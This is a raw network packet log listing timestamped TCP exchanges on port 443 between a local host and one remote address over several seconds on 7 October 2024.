Oct 7, 2024 18:47:47.546988010 CEST	443	49814	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.547197104 CEST	49814	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.547342062 CEST	49814	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.547353029 CEST	443	49814	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.579397917 CEST	443	49810	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.663350105 CEST	443	49810	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.663439035 CEST	443	49810	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.663506031 CEST	49810	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.663676023 CEST	49810	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.663696051 CEST	443	49810	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.663708925 CEST	49810	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.663714886 CEST	443	49810	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.666899920 CEST	49815	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.667011976 CEST	443	49815	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.667113066 CEST	49815	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.667301893 CEST	49815	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.667339087 CEST	443	49815	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.733903885 CEST	443	49811	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.734560013 CEST	49811	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.734633923 CEST	443	49811	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.735177040 CEST	49811	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.735192060 CEST	443	49811	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.818196058 CEST	443	49812	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.818749905 CEST	49812	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.818825960 CEST	443	49812	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.819422007 CEST	49812	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.819437981 CEST	443	49812	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.052198887 CEST	443	49813	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.052860975 CEST	49813	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.052872896 CEST	443	49813	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.053359985 CEST	49813	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.053364992 CEST	443	49813	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.521871090 CEST	443	49811	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.521941900 CEST	443	49811	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.522018909 CEST	49811	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.527787924 CEST	443	49812	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.527848005 CEST	443	49812	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.527914047 CEST	49812	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.527952909 CEST	443	49813	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.528027058 CEST	443	49813	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.529684067 CEST	49813	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.548346043 CEST	49811	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.548371077 CEST	443	49811	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.548391104 CEST	49811	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.548398972 CEST	443	49811	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.549509048 CEST	49812	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.549525976 CEST	443	49812	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.550792933 CEST	49813	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.550820112 CEST	443	49813	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.551501036 CEST	49813	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.551511049 CEST	443	49813	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.557749987 CEST	49817	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.557760000 CEST	443	49817	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.557825089 CEST	49817	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.559194088 CEST	49818	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.559201002 CEST	443	49818	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.559278965 CEST	49818	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.560507059 CEST	49819	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.560535908 CEST	443	49819	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.560595989 CEST	49819	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.562875986 CEST	49817	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.562885046 CEST	443	49817	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.563004017 CEST	49818	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.563010931 CEST	443	49818	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.572644949 CEST	49819	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.572658062 CEST	443	49819	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.584287882 CEST	443	49818	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.585736990 CEST	49818	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.589104891 CEST	49818	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.589118004 CEST	443	49818	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.594904900 CEST	443	49819	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.597635031 CEST	49819	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.601469040 CEST	49821	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.601495981 CEST	443	49821	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.601551056 CEST	49821	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.605729103 CEST	49819	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.605739117 CEST	443	49819	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.605911016 CEST	49821	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.605922937 CEST	443	49821	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.606071949 CEST	49822	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.606087923 CEST	443	49822	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.606197119 CEST	49822	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.606283903 CEST	49822	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.606292009 CEST	443	49822	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.621206045 CEST	443	49821	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.622469902 CEST	443	49822	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.718735933 CEST	443	49814	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.730022907 CEST	49823	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.730067968 CEST	443	49823	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.730268002 CEST	49823	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.731376886 CEST	49824	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.731415987 CEST	443	49824	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.731520891 CEST	49824	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.732623100 CEST	49814	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.732623100 CEST	49814	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.732644081 CEST	443	49814	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.732662916 CEST	443	49814	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.755472898 CEST	443	49815	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.810967922 CEST	49823	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.810997009 CEST	443	49823	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.811671019 CEST	49815	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.811923027 CEST	49824	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.811934948 CEST	443	49824	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.815026045 CEST	49815	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.815047026 CEST	443	49815	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.821093082 CEST	49815	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.821108103 CEST	443	49815	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.832005978 CEST	443	49814	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.832088947 CEST	443	49814	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.832370996 CEST	49814	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.832515955 CEST	49814	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.832537889 CEST	443	49814	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.832550049 CEST	49814	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.832557917 CEST	443	49814	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.838475943 CEST	49825	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.838527918 CEST	443	49825	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.838593960 CEST	49825	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.838869095 CEST	49825	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.838882923 CEST	443	49825	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.931128979 CEST	443	49815	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.932195902 CEST	443	49815	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.932326078 CEST	49815	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.932765007 CEST	49815	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.932801008 CEST	443	49815	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.932818890 CEST	49815	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.932826042 CEST	443	49815	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.945430994 CEST	49826	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.945467949 CEST	443	49826	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:48.945533991 CEST	49826	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.946018934 CEST	49826	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:48.946036100 CEST	443	49826	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.188225985 CEST	443	49817	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.189090014 CEST	49817	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.189136982 CEST	443	49817	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.189703941 CEST	49817	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.189716101 CEST	443	49817	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.309883118 CEST	443	49817	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.310355902 CEST	443	49817	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.310558081 CEST	49817	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.310620070 CEST	49817	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.310620070 CEST	49817	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.310652971 CEST	443	49817	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.310674906 CEST	443	49817	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.314084053 CEST	49827	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.314129114 CEST	443	49827	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.314842939 CEST	49827	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.315150976 CEST	49827	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.315165043 CEST	443	49827	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.402725935 CEST	443	49824	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.402825117 CEST	49824	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.403294086 CEST	443	49823	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.403358936 CEST	49823	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.403906107 CEST	443	49825	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.403976917 CEST	49825	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.404356956 CEST	49824	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.404367924 CEST	443	49824	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.404685974 CEST	443	49824	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.405292034 CEST	49823	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.405297995 CEST	443	49823	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.405529976 CEST	443	49823	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.405752897 CEST	49825	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.405760050 CEST	443	49825	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.406136990 CEST	443	49825	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.406555891 CEST	49823	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.406722069 CEST	49824	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.407341957 CEST	49825	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.415580034 CEST	443	49826	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.415708065 CEST	49826	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.416987896 CEST	49826	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.416991949 CEST	443	49826	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.417226076 CEST	443	49826	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.419899940 CEST	49826	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.447403908 CEST	443	49825	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.447407007 CEST	443	49824	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.447433949 CEST	443	49823	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.463399887 CEST	443	49826	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.660761118 CEST	443	49824	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.660953045 CEST	443	49824	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.661082983 CEST	49824	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.661124945 CEST	443	49825	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.661158085 CEST	443	49825	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.661190987 CEST	49824	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.661209106 CEST	443	49825	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.661216974 CEST	443	49824	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.661225080 CEST	49825	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.661273003 CEST	49825	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.661433935 CEST	49825	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.661452055 CEST	443	49825	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.661463976 CEST	49825	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.661469936 CEST	443	49825	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.662817001 CEST	443	49823	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.662842989 CEST	443	49823	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.662883043 CEST	443	49823	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.662944078 CEST	49823	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.663681030 CEST	49823	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.663692951 CEST	443	49823	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.663707018 CEST	49823	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.663712978 CEST	443	49823	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.666572094 CEST	49828	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.666620970 CEST	443	49828	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.666804075 CEST	49828	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.667125940 CEST	49829	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.667176962 CEST	443	49829	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.667252064 CEST	49829	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.667908907 CEST	49828	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.667934895 CEST	443	49828	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.668441057 CEST	49830	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.668461084 CEST	443	49830	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.668689966 CEST	49830	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.668745995 CEST	49829	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.668775082 CEST	443	49829	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.668904066 CEST	49830	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.668926954 CEST	443	49830	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.678065062 CEST	443	49826	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.678225040 CEST	443	49826	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.678389072 CEST	49826	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.678471088 CEST	49826	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.678486109 CEST	443	49826	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.678497076 CEST	49826	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.678502083 CEST	443	49826	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.680984020 CEST	49831	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.681030989 CEST	443	49831	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:50.681349039 CEST	49831	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.681567907 CEST	49831	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:50.681586981 CEST	443	49831	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.396891117 CEST	443	49827	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.396969080 CEST	49827	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.398694038 CEST	49827	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.398701906 CEST	443	49827	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.399125099 CEST	443	49827	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.400346994 CEST	49827	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.443444967 CEST	443	49827	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.513438940 CEST	443	49827	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.513525963 CEST	443	49827	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.513649940 CEST	443	49827	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.513673067 CEST	49827	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.513938904 CEST	49827	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.534348011 CEST	49827	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.534369946 CEST	443	49827	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.534380913 CEST	49827	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.534385920 CEST	443	49827	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.536792994 CEST	49832	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.536910057 CEST	443	49832	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.537012100 CEST	49832	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.537153959 CEST	49832	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.537178993 CEST	443	49832	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.582658052 CEST	443	49830	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.583194971 CEST	49830	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.583230019 CEST	443	49830	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.583605051 CEST	49830	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.583610058 CEST	443	49830	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.585483074 CEST	443	49829	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.586319923 CEST	443	49828	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.588242054 CEST	49829	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.588255882 CEST	443	49829	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.594443083 CEST	49829	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.594451904 CEST	443	49829	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.599950075 CEST	443	49831	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.602320910 CEST	49828	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.602360964 CEST	443	49828	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.606746912 CEST	49828	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.606754065 CEST	443	49828	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.607008934 CEST	49831	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.607023954 CEST	443	49831	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.614510059 CEST	49831	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.614516020 CEST	443	49831	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.690882921 CEST	443	49830	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.691340923 CEST	443	49830	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.691437006 CEST	49830	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.694787979 CEST	49830	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.694787979 CEST	49830	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.694812059 CEST	443	49830	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.694818974 CEST	443	49830	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.696727991 CEST	443	49829	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.697138071 CEST	443	49829	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.697211027 CEST	49829	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.697217941 CEST	443	49829	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.697252989 CEST	443	49829	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.697297096 CEST	49829	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.707634926 CEST	49829	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.707647085 CEST	443	49829	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.707654953 CEST	49829	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.707659960 CEST	443	49829	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.708836079 CEST	443	49828	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.708906889 CEST	443	49828	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.708964109 CEST	49828	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.718755960 CEST	443	49831	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.718774080 CEST	443	49831	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.718830109 CEST	443	49831	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.718837976 CEST	49831	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.721741915 CEST	49831	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.724409103 CEST	49828	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.724427938 CEST	443	49828	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.724440098 CEST	49828	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.724447012 CEST	443	49828	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.733891010 CEST	49831	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.733896971 CEST	443	49831	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.733983994 CEST	49831	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.733989000 CEST	443	49831	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.735631943 CEST	49833	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.735658884 CEST	443	49833	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.735955000 CEST	49833	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.737457991 CEST	49834	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.737464905 CEST	443	49834	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.737541914 CEST	49834	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.738518000 CEST	49835	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.738626957 CEST	443	49835	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.738723040 CEST	49835	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.739099026 CEST	49833	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.739110947 CEST	443	49833	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.739234924 CEST	49834	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.739243031 CEST	443	49834	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.739322901 CEST	49835	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.739361048 CEST	443	49835	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.740386963 CEST	49836	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.740487099 CEST	443	49836	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:51.740567923 CEST	49836	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.740712881 CEST	49836	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:51.740751982 CEST	443	49836	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.419816017 CEST	443	49836	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.420520067 CEST	49836	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.420583963 CEST	443	49836	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.420953035 CEST	49836	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.420973063 CEST	443	49836	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.428591967 CEST	443	49833	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.428915977 CEST	49833	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.428934097 CEST	443	49833	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.429476023 CEST	49833	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.429481030 CEST	443	49833	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.440300941 CEST	443	49832	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.440814972 CEST	49832	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.440911055 CEST	443	49832	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.441188097 CEST	49832	443	192.168.2.6	13.107.253.72
